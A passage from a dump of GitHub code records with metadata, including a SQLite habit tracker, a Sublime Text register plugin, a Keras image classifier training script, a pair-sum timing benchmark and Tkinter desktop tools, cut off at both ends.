ourModel.save_networks(epoch+1)\n ourModel.save_networks(epoch+1)\n\n", "repo_name": "shikivi/Eliminate-the-selected-objects-in-video", "sub_path": "Image Inpainting/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2205, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "options.train_options.TrainOptions", "line_number": 10, "usage_type": "call"}, {"api_name": "data.data.InpaintingDataset", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 13, "usage_type": "name"}, {"api_name": "data.data.ToTensor", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 14, "usage_type": "call"}, {"api_name": "model.net.InpaintingModel_GMCNN", "line_number": 18, "usage_type": "call"}, {"api_name": "util.utils.getLatest", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "data.data", "line_number": 27, "usage_type": "name"}, {"api_name": "data.data", "line_number": 28, "usage_type": "name"}, {"api_name": "torchvision.utils.make_grid", "line_number": 47, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 47, "usage_type": "name"}, {"api_name": "torchvision.utils.make_grid", "line_number": 48, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 48, "usage_type": "name"}, {"api_name": "torchvision.utils.make_grid", "line_number": 49, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "4061196425", "text": "from tkinter import *\nfrom tkinter import ttk\nfrom twisted.internet import tksupport, reactor, threads\nfrom tkinter import simpledialog\n\nfrom .data import *\n\nclass OfficeManager(Frame):\n\n def __init__(self, parent):\n\n super().__init__(parent, height=1000)\n\n # Define Variables\n self.parent = parent\n\n # Treeview Setup\n self.managerScroll = Scrollbar(self)\n self.manager = ttk.Treeview(self, yscrollcommand=self.managerScroll.set)\n self.managerScroll[\"command\"] = self.manager.yview\n\n self.manager[\"columns\"] = (\"#1\", \"#2\")\n self.manager.heading(\"#0\", text=\"Room ID\")\n self.manager.heading(\"#1\", text=\"Room Name/Title\")\n self.manager.heading(\"#2\", text=\"Current Tenant\")\n\n # Pack Widgets\n self.managerScroll.pack(side=RIGHT, fill=Y)\n self.manager.pack(side=TOP, fill=BOTH, expand=True)\n\n def new_global_notice(self, *args):\n\n try:\n message = simpledialog.askstring(title=\"Send Global Notice\", prompt=\"What would you like to say?\")\n finally:\n # Submit Notification to Server\n title = \"Notice for All Offices - Reception Desk\"\n\n # Notification Setup\n notif = Notification(title, message)\n\n self.parent.factory.send_global_notice(notif)\n \n\nclass NoticeManager(Toplevel):\n\n def __init__(self, parent, office=None):\n\n super().__init__(parent)\n\n # Define Variables\n self.parent = parent\n self.office = office\n\n # Window Setup\n #tksupport.install(self)\n if office == None:\n self.title(\"Send Notice - All Offices\")\n else:\n self.title(\"Send Notice - \" + office.id)\n\n # Notifcation Input Setup\n self.title = StringVar()\n self.message = StringVar()\n\n self.titleEntry = Text(self, width=100, height=1)\n self.messageEntry = Text(self, width=100, height=5)\n\n self.titleEntry.pack(side=TOP, pady=10)\n self.messageEntry.pack(side=TOP, pady=10, padx=20)\n\n self.submit = ttk.Button(self, text=\"Send\", command=self.submit)\n self.submit.pack(side=TOP, anchor=E, pady=10, padx=20)\n\n # Window Loop\n self.mainloop()\n\n def send(self, notif):\n\n # Send Notification\n if self.office == None:\n self.parent.factory.send_global_notice(notif)\n\n def submit(self, *args):\n\n # Submit Notification to Server\n title = self.titleEntry.get(\"1.0\", END)\n message = self.messageEntry.get(\"1.0\", END)\n\n # Notification Setup\n notif = Notification(title, message)\n\n reactor.callInThread(self.send, notif)\n \n # Destroy Window\n self.destroy()\n", "repo_name": "FlopsiBunny/ReceptionDemo", "sub_path": "Console/lib/offices.py", "file_name": "offices.py", "file_ext": "py", "file_size_in_byte": 2739, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tkinter.ttk.Treeview", "line_number": 19, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 19, "usage_type": "name"}, {"api_name": "tkinter.simpledialog.askstring", "line_number": 34, "usage_type": "call"}, {"api_name": "tkinter.simpledialog", "line_number": 34, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 72, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 72, "usage_type": "name"}, {"api_name": "twisted.internet.reactor.callInThread", "line_number": 93, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "39438742265", "text": "import sqlite3\n\n\n# 1) CREATE HABIT TABLE\ndef CreateHabitTable():\n try:\n # SAVE IN MEMORY, EVERYTIME ALL DATA CREATED IS RESTARTED FROM NOTHING\n # db = sqlite3.connect(':memory:')\n db = sqlite3.connect('habits.db')\n # db.execute(\"PRAGMA foreign_keys = 1\") # NOT WORKING: TO ACTIVATE CASCADE FUNC IN SQLITE3\n cur = db.cursor()\n except sqlite3.Error as e:\n print(\"Error, please restart the application again.\")\n exit(1)\n\n cur.execute(\"\"\"CREATE TABLE IF NOT EXISTS habits (\n habit_id INTEGER PRIMARY KEY AUTOINCREMENT,\n taskname TEXT NOT NULL,\n description TEXT,\n operator TEXT NOT NULL,\n target_quantity REAL NOT NULL,\n unit TEXT NOT NULL,\n frequency TEXT NOT NULL,\n days_to_success INTEGER NOT NULL,\n login_id INTEGER NOT NULL, \n FOREIGN KEY (login_id) REFERENCES users (login_id)\n ON UPDATE CASCADE\n ON DELETE CASCADE\n )\"\"\")\n\n db.close()\n\n# 2) INSERT ROW IN TABLE\ndef InsertHabit(task):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n # THIS METHOD DON'T NEED db.commit()\n with db:\n # cur.execute(\"INSERT INTO habits VALUES (null, :taskname, :description, :event, :operator, :target_quantity, :unit, :frequency, :days_to_success)\",\n # {'taskname': task.taskname, 'description': task.description, 'event': task.event, 'operator': task.operator, 'target_quantity': task.target_quantity, 'unit': task.unit, 'frequency': task.frequency, 'days_to_success': task.days_to_success})\n cur.execute(\"INSERT INTO habits VALUES (null, ?, ?, ?, ?, ?, ?, ?, ?)\",\n (task.taskname, task.description, task.operator, task.target_quantity, task.unit, task.frequency, task.days_to_success, task.login_id))\n db.close()\n\n# 3) SEARCH IF ALREADY CREATED PRESET USERS\ndef SearchFirstHabit(login_id):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n cur.execute(\"SELECT login_id FROM habits WHERE login_id=:login_id\", {'login_id': login_id})\n return cur.fetchall()\n\n db.close()\n\n# 4) SHOW INFO\ndef AllHabit(login_id):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n cur.execute(\"SELECT habit_id, taskname FROM habits WHERE login_id=:login_id\", {'login_id': login_id})\n return cur.fetchall()\n\n db.close()\n\n# 5) SHOW LATEST ROW INFO\ndef SearchLatestHabit():\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n cur.execute(\"\"\"SELECT days_to_success, habit_id, taskname FROM habits \n WHERE habit_id=\n (SELECT habit_id FROM habits ORDER BY habit_id DESC LIMIT 1)\"\"\")\n\n return cur.fetchall()[0]\n\n db.close()\n\n# 6) SEARCH INFO\ndef SearchHabit(habit_id):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n cur.execute(\"SELECT taskname, operator, target_quantity, unit, frequency, days_to_success FROM habits WHERE habit_id=:habit_id\", {'habit_id': habit_id})\n return cur.fetchall()\n\n db.close()\n\n# 7) SEARCH INFO\ndef DuplicateHabitCheck(taskname):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n cur.execute(\"SELECT * FROM habits WHERE taskname=:taskname\", {'taskname': taskname})\n return cur.fetchall()\n\n db.close()\n\n# 8) UPDATE INFO\ndef UpdateHabit(habit_id, operator, target_quantity, unit, frequency, days_to_success):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n with db:\n cur.execute(\"\"\"UPDATE habits SET operator = :operator, target_quantity = :target_quantity, unit = :unit, frequency = :frequency, days_to_success = :days_to_success\n WHERE habit_id=:habit_id\"\"\", {'operator': operator, 'target_quantity': target_quantity, 'unit': unit, 'frequency': frequency, 'days_to_success': days_to_success, 'habit_id': habit_id})\n\n db.close()\n\n# 9) REMOVE RECORD\ndef RemoveHabit(habit_id):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n with db:\n cur.execute(\"DELETE FROM habits WHERE habit_id = :habit_id\", {'habit_id': habit_id})\n\n db.close()\n\n# 10) CHECK DATABASE\ndef CheckDB():\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n cur.execute(\"SELECT * FROM habits\")\n return cur.fetchall()\n\n db.close()\n\n# print(CheckDB())\n\n\n", "repo_name": "ConfitureCheung/Habit_Tracking", "sub_path": "45.IU Homework/round 4/habit_db.py", "file_name": "habit_db.py", "file_ext": "py", "file_size_in_byte": 4371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlite3.connect", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 68, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 81, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 91, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 101, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 112, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 122, "usage_type": "call"}]} +{"seq_id": "36075607516", "text": "import functools as fu\nimport sublime\nimport sublime_plugin\nimport re\n\nfrom .lib.misc import *\n\nclass SbpRegisterStore:\n \"\"\"\n Base class to store data for the registers, could be a plain dict,\n but we make it more complicated by wrapping the dict :)\n \"\"\"\n registers = {}\n\n # If you want seperate text and point registers enabling mapping to the same keys\n # delete the global registers and uncomment the code below\n # def __init__(self):\n # self.registers = {}\n\n def get(self, key):\n if not key in self.registers:\n return \"\"\n else:\n return self.registers[key]\n\n def format_for_popup(self, text):\n # stripe newlines, spaces and tabs from the beginning and end\n text = text.strip(\"\\n \\t\")\n\n # collapse multiple newlines into a single and convert to a glyph\n # text = re.sub(\"\\n+\", \"↩\", text)\n # text = re.sub(\"\\n+\", \"\\u23ce\", text)\n text = re.sub(\"\\n+\", \"\\u00b6\", text)\n\n # replace multiple white space with single spaces within the string\n text = re.sub(\"\\\\s\\\\s+\", \" \", text)\n\n # Old formatting before using glyphs\n # text = text.strip(\"\\n \\t\").replace(\"\\n\", \" \\\\n\")\n # text = re.sub(\"(\\s\\\\\\\\n)+\",\" \\\\\\\\n\", text)\n # text = re.sub(\"\\\\s\\\\s+\", \" \", text)\n\n return text\n\n def truncate_for_popup(self, view, text, reg_type):\n # Detect width of viewport and modify output text accordingly for better viewing\n # 3 subtracted because the beginning of each registers is like (a: ) before the start of\n # the text\n #\n max_chars = (view.viewport_extent()[0] / view.em_width()) * .9 - 3\n\n # truncate text registers showing half of the beginning and end portion\n # for point registers just show the beginning portion where the jump will occur too\n if len(text) > max_chars and reg_type == \"text\":\n half = int(max_chars / 2)\n text = text[:half] + \"\\u27FA\" + text[-half:] + \" \"\n else:\n text = text[:int(max_chars)] + \" \"\n\n return text\n\n def get_point_registers(self):\n items = []\n for item in self.registers.items():\n if item[1][0] is not None:\n items.append([item[0],self.format_for_popup(item[1][3])])\n return items\n\n def get_text_registers(self):\n items = []\n for item in self.registers.items():\n if item[1][0] is None:\n items.append([item[0],self.format_for_popup(item[1][3])])\n return items\n\n # TODO: Clear all text registers or point registers\n # TODO: Possibly use pop-up to delete registers if easy\n\n\n def store(self, key, val):\n self.registers[key] = val\n\n def __contains__(self, key):\n return key in self.registers\n\n# Global variable to store data in the registers\nsbp_text_registers = SbpRegisterStore()\nsbp_point_registers = SbpRegisterStore()\n\nclass SbpPointToRegister(SbpTextCommand):\n ''' Stores the current selection, if it is a single selection, in a special\n register. This allows quick bookkeeping of positions in the document. However\n it stores as well the window and the region so that focussing from other\n windows is possible'''\n panel = None\n\n def run_cmd(self, jove):\n self.jove = jove\n self.panel = self.view.window().show_input_panel(\"Store point into register:\", \"\", \\\n self.on_done, \\\n self.on_change,\\\n self.on_cancel)\n\n def on_done(self, register):\n pass\n\n def on_cancel(self):\n pass\n\n def on_change(self, register):\n\n if self.panel == None:\n return\n\n self.panel.window().run_command(\"hide_panel\")\n\n sel = self.view.sel()\n line = self.view.line(sel[0])\n line_substr = ''\n if (sel is None) or len(sel) != 1:\n return\n\n # grab first four lines below the current line for viewing of jump\n for i in range(4):\n line_substr += self.view.substr(line) + '\\n'\n line = self.view.line(line.end()+2)\n\n sbp_point_registers.store(register, (self.view, self.view.window(), sel[0],\n line_substr))\n\n\nclass SbpJumpToPoint:\n def jump(point_data):\n point = point_data[2]\n\n point_data[0].sel().clear()\n point_data[0].sel().add(point)\n\n point_data[1].focus_group(0)\n point_data[1].focus_view(point_data[0])\n\n # Check if the point is in view, if not scroll to\n visible = point_data[0].visible_region()\n if not visible.contains(point):\n point_data[0].run_command(\"jove_center_view\")\n\n# For some reason switching windows does not work and we can only switch to files\n# in the current window\nclass SbpPointFromRegister(sublime_plugin.TextCommand):\n '''Restore the point from a register with a given command. This will focus the\n point even if it comes from another window and view'''\n\n panel = None\n\n def run(self, edit, register = None):\n if register in sbp_point_registers:\n self.insert(edit, register)\n else:\n self.panel = self.view.window().show_input_panel(\"Jump to point from register:\", \"\", \\\n None, \\\n fu.partial(self.insert, edit),\\\n None)\n\n def insert(self, edit, register):\n if not self.panel:\n return\n\n self.panel.window().run_command(\"hide_panel\")\n\n if register in sbp_point_registers:\n SbpJumpToPoint.jump(sbp_point_registers.get(register))\n\nclass SbpRegisterStore(SbpTextCommand):\n '''\n Emacs style command allowing to store a certain value\n inside a global register.\n '''\n panel = None\n\n def run_cmd(self, jove):\n self.jove = jove\n self.panel = self.view.window().show_input_panel(\"Store into register:\", \"\", \\\n self.on_done, \\\n self.on_change,\\\n self.on_cancel)\n\n def on_done(self, register):\n pass\n\n def on_cancel(self):\n pass\n\n def on_change(self, register):\n\n if self.panel == None:\n return\n\n self.panel.window().run_command(\"hide_panel\")\n\n sel = self.view.sel()\n if (sel is None) or len(sel) != 1:\n return\n\n # Get the region\n sbp_text_registers.store(register, (None, None, None, self.view.substr(self.jove.get_encompassing_region())))\n\n\n\nclass SbpRegisterDoInsert(SbpTextCommand):\n\n def run_cmd(self, jove, content):\n sel = jove.get_point()\n jove.view.replace(jove.edit, sublime.Region(sel, sel), content)\n jove.view.sel().clear()\n jove.view.sel().add(sublime.Region(sel + len(content), sel + len(content)))\n jove.view.window().focus_view(self.view)\n\nclass SbpRegisterInsert(SbpTextCommand):\n \"\"\"\n Simple command to insert the value stored in the register\n at the point that is currently active\n \"\"\"\n\n panel = None\n\n def run_cmd(self, jove):\n self.panel = self.view.window().show_input_panel(\"Insert from register:\", \"\", \\\n None, \\\n self.insert,\\\n None)\n\n def insert(self, register):\n if not self.panel:\n return\n\n self.panel.window().run_command(\"hide_panel\")\n\n sel = self.view.sel()\n if (sel is None) or len(sel) != 1:\n return\n\n self.view.window().run_command(\"sbp_register_do_insert\", {\"content\": sbp_text_registers.get(register)[3]})\n\nclass SbpChooseAndYankRegister(SbpTextCommand):\n\n def run_cmd(self, util):\n # items is an array of (index, text) pairs\n items = sbp_text_registers.get_text_registers()\n\n def on_done(idx):\n if idx >= 0:\n util.run_command(\"sbp_register_do_insert\", {\"content\": sbp_text_registers.get(items[idx][0])[3]})\n\n # To pass in for truncation of display strings\n view = self.view\n\n if items:\n sublime.active_window().show_quick_panel([item[0] + \": \" + sbp_text_registers.truncate_for_popup(view, item[1], \"text\") for item in items], on_done)\n else:\n sublime.status_message('Nothing in history')\nclass SbpChooseAndYankPoint(SbpTextCommand):\n\n def run_cmd(self, util):\n # items is an array of (index, text) pairs\n items = sbp_point_registers.get_point_registers()\n\n def on_done(idx):\n if idx >= 0:\n SbpJumpToPoint.jump(sbp_point_registers.get(items[idx][0]))\n\n # To pass in for truncation of display strings\n view = self.view\n\n if items:\n sublime.active_window().show_quick_panel([item[0] + \": \" + sbp_point_registers.truncate_for_popup(view, item[1], \"point\") for item in items], on_done)\n else:\n sublime.status_message('Nothing in history')\n # if items:\n # sublime.active_window().show_quick_panel([item[0] + \": \" + item[1][:viewTextLength] for item in items], on_done)\n # else:\n # sublime.status_message('Nothing in history')\n", "repo_name": "sublime-emacs/sublemacspro", "sub_path": "sbp_register.py", "file_name": "sbp_register.py", "file_ext": "py", "file_size_in_byte": 9024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 566, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.sub", "line_number": 33, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 36, "usage_type": "call"}, {"api_name": "sublime_plugin.TextCommand", "line_number": 149, "usage_type": "attribute"}, {"api_name": "functools.partial", "line_number": 161, "usage_type": "call"}, {"api_name": "sublime.Region", "line_number": 213, "usage_type": "call"}, {"api_name": "sublime.Region", "line_number": 215, "usage_type": "call"}, {"api_name": "sublime.active_window", "line_number": 258, "usage_type": "call"}, {"api_name": "sublime.status_message", "line_number": 260, "usage_type": "call"}, {"api_name": "sublime.active_window", "line_number": 275, "usage_type": "call"}, {"api_name": "sublime.status_message", "line_number": 277, "usage_type": "call"}]} +{"seq_id": "72340662886", "text": "import sys\nimport time\nimport random\nimport matplotlib.pyplot as plt\n\n\nclass BuscadorDePares:\n def __init__(self, argv):\n self.argv = argv\n self.ejecutar()\n\n @staticmethod\n def convertir_lista(lista):\n return list(map(int, lista))\n\n @staticmethod\n def encontrar_pares_original(arr, suma):\n pares = []\n for i in range(len(arr)):\n for j in range(i + 1, len(arr)):\n if arr[i] + arr[j] == suma:\n pares.append((arr[i], arr[j]))\n return pares\n\n @staticmethod\n def encontrar_pares_hash_table(arr, suma):\n hash_table = {}\n pares = []\n for num in arr:\n complemento = suma - num\n if complemento in hash_table:\n pares.append((num, complemento))\n hash_table[num] = True\n return pares\n\n def encontrar_pares(self, arr, suma):\n \n pares = []\n for i in range(len(arr)):\n for j in range(i + 1, len(arr)):\n if arr[i] + arr[j] == suma:\n pares.append((arr[i], arr[j]))\n return pares\n\n\n\n def ejecutar(self):\n if len(self.argv) == 1:\n times = []\n tamanios = []\n for i in range(100):\n arreglo_i = []\n for j in range(i + 5):\n arreglo_i.append(random.randint(1, 100))\n tamanios.append(i + 5)\n inicio = time.perf_counter()\n resultado = self.encontrar_pares(arreglo_i, 0)\n final = time.perf_counter()\n times.append(final - inicio)\n plt.plot(tamanios, times, marker='o', linestyle='-', color='b', label='Datos de ejemplo')\n plt.show()\n elif len(self.argv) == 3:\n lista = self.convertir_lista(self.argv[1].split(','))\n inicio = time.perf_counter()\n resultado = self.encontrar_pares(lista, int(self.argv[2]))\n final = time.perf_counter()\n tiempoCalculado = final - inicio\n print(*resultado, sep='\\n')\n elif len(self.argv) == 2:\n tex = self.leer_archivo(self.argv[1])\n for i in range(len(tex)):\n lista = self.convertir_lista(tex[1].split()[0].split(','))\n resultado = self.encontrar_pares(lista, int(tex[i].split()[1]))\n print(*resultado, sep=\"\\n\")\n else:\n print(\"Los datos no son correctos\")\n\n # Obtener tiempos de ejecución para el enfoque original\n times_original = []\n for i in range(5, 105, 5):\n arreglo_i = [random.randint(1, 100) for _ in range(i)]\n inicio = time.perf_counter()\n resultado = self.encontrar_pares_original(arreglo_i, 12) # Buscar el número 12 como objetivo\n final = time.perf_counter()\n times_original.append(final - inicio)\n\n # Obtener tiempos de ejecución para el enfoque con tabla de hash\n times_hash_table = []\n for i in range(5, 105, 5):\n arreglo_i = [random.randint(1, 100) for _ in range(i)]\n inicio = time.perf_counter()\n resultado = self.encontrar_pares_hash_table(arreglo_i, 12) # Buscar el número 12 como objetivo\n final = time.perf_counter()\n times_hash_table.append(final - inicio)\n\n # Graficar los resultados\n tamanios = list(range(5, 105, 5))\n plt.plot(tamanios, times_original, marker='o', linestyle='-', color='b', label='Enfoque Original')\n plt.plot(tamanios, times_hash_table, marker='o', linestyle='-', color='r', label='Tabla de Hash')\n\n plt.xlabel('Tamaño de la lista de entrada')\n plt.ylabel('Tiempo de ejecución (segundos)')\n plt.title('Comparación de tiempos de ejecución entre enfoques')\n plt.legend()\n plt.grid(True)\n plt.show()\n\n\nif __name__ == '__main__':\n buscador_de_pares = BuscadorDePares(sys.argv)\n", "repo_name": "ValEscoSierra/Reto-Analisis-de-Complejidad", "sub_path": "samineitor_analisis.py", "file_name": "samineitor_analisis.py", "file_ext": "py", "file_size_in_byte": 3971, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.randint", "line_number": 54, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 56, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "time.perf_counter", "line_number": 64, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 66, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 81, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 82, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 84, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 90, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 91, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 110, "usage_type": "attribute"}]} +{"seq_id": "18597768116", "text": "# Importing the Keras libraries and packages\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Convolution2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Dense\n\n# Step 1 - Building the CNN\n\n# Initializing the CNN\nclassifier = Sequential()\n\n# First convolution layer and pooling\nclassifier.add(Convolution2D(32, (3, 3), input_shape=(200, 200, 1), activation='relu'))\nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n# Second convolution layer and pooling\nclassifier.add(Convolution2D(32, (3, 3), activation='relu'))\n# input_shape is going to be the pooled feature maps from the previous convolution layer\nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n# Flattening the layers\nclassifier.add(Flatten())\n\n# Adding a fully connected layer\nclassifier.add(Dense(units=128, activation='relu'))\nclassifier.add(Dense(units=6, activation='softmax')) # softmax for more than 2\n\n# Compiling the CNN\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']) # binary_crossentropy for more than 2\n\n\n# Step 2 - Preparing the train/test data and training the model\n\n# Code copied from - https://keras.io/preprocessing/image/\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nfrom PIL import ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntraining_set = train_datagen.flow_from_directory('data/train',\n target_size=(200, 200),\n batch_size=5,\n color_mode='grayscale',\n class_mode='binary')\n\ntest_set = test_datagen.flow_from_directory('data/test',\n target_size=(200, 200),\n batch_size=5,\n color_mode='grayscale',\n class_mode='binary') \n\nSTEP_SIZE_TRAIN=training_set.n\nSTEP_SIZE_TEST=test_set.n\n\nclassifier.fit(\n training_set,\n epochs=1,\n validation_data=test_set)\n\n\n# Saving the model\nmodel_json = classifier.to_json()\nwith open(\"./models/model-bw.json\", \"w\") as json_file:\n json_file.write(model_json)\nclassifier.save_weights('./models/model-bw.h5')\n\n", "repo_name": "inPhamous/knife-detection", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2580, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tensorflow.keras.models.Sequential", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Convolution2D", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Convolution2D", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.ImageFile.LOAD_TRUNCATED_IMAGES", "line_number": 38, "usage_type": "attribute"}, {"api_name": "PIL.ImageFile", "line_number": 38, "usage_type": "name"}, {"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "20096934797", "text": "from tkinter import * \nfrom tkinter import messagebox, ttk\nfrom openpyxl import *\nimport datetime, os, sys, getpass\n\nroot = Tk()\nroot.title(\"Analisa FO v1.2.0\")\n\nroot.state('zoomed')\n\n# Changing to the directory\nos.chdir(r\"\\\\polarsu2\\Geqma\\Engenharia da Qualidade\\Laudos\\FO\\APP\\BASE DADOS\")\n\nemptyRow = None\ndefinedRow = False\n\nfoNumber = \"\"\narriveDate = \"\"\narriveHour = \"\"\ndeliveringDate = \"\"\ndeliveringHour = \"\"\ndefect = \"\"\ntestType = \"\"\nfoTest = \"\"\nnumberOfTestingPoints = 0\nregister = \"\"\ncomment = \"\"\nidString = \"\"\n\nanalisedFos = []\n\nwb = load_workbook(\"results.xlsx\")\nresultSheet = wb[\"resultsSheet\"]\n\nfor b in range(2, 1048576):\n\te = resultSheet.cell(row=b, column=5)\n\n\tif e.value != None and e.value != \"\":\n\t\tanalisedFos.append(e.value)\n\telse:\n\t\tbreak\t\n\nwb.close()\n\nprint(\"Analised FOs\")\n\nregisteredFos = []\ncomboBoxTextValues = []\n\nfoNumberValues = []\narriveDateValues = []\narriveHourValues = []\ndeliveringDateValues = []\ndeliveringHourValues = []\ndefectValues = []\ntestTypeValues = []\nvaluesList = []\nnumberOfTestingPointsValues = []\nregisterValues = []\ncommentValues = []\nidValues = []\n\nregisteredFoNumberValues = []\nregisteredArriveDateValues = []\nregisteredArriveHourValues = []\nregisteredDeliveringDateValues = []\nregisteredDeliveringHourValues = []\nregisteredDefectValues = []\nregisteredTestTypeValues = []\nregisteredValuesList = []\nregisteredNumberOfTestingPointsValues = []\nregisteredRegisterValues = []\nregisteredCommentValues = []\nregisteredIdValues = []\n\ntestingPointsLabelList = {}\ntestingPointsEntryList = {}\n\nresultList = {}\n\nanalised = []\n\nwb = load_workbook(\"db.xlsx\")\nws = wb[\"fosParaAnalise\"]\n\nfor z in range(2,1048576):\n\t# 1048576 is the max number of rows in excel\n\ta = ws.cell(row=z, column=1)\n\tb = ws.cell(row=z, column=2)\n\tc = ws.cell(row=z, column=3)\n\td = ws.cell(row=z, column=4)\n\te = ws.cell(row=z, column=5)\n\tf = ws.cell(row=z, column=6)\n\tg = ws.cell(row=z, column=7)\n\th = ws.cell(row=z, column=8)\n\tI = ws.cell(row=z, column=9)\n\tj = ws.cell(row=z, column=10)\n\tk = ws.cell(row=z, column=11)\n\tl = ws.cell(row=z, column=12)\n\t\n\tif l.value != None and l.value != \"\":\n\n\t\tif l.value not in 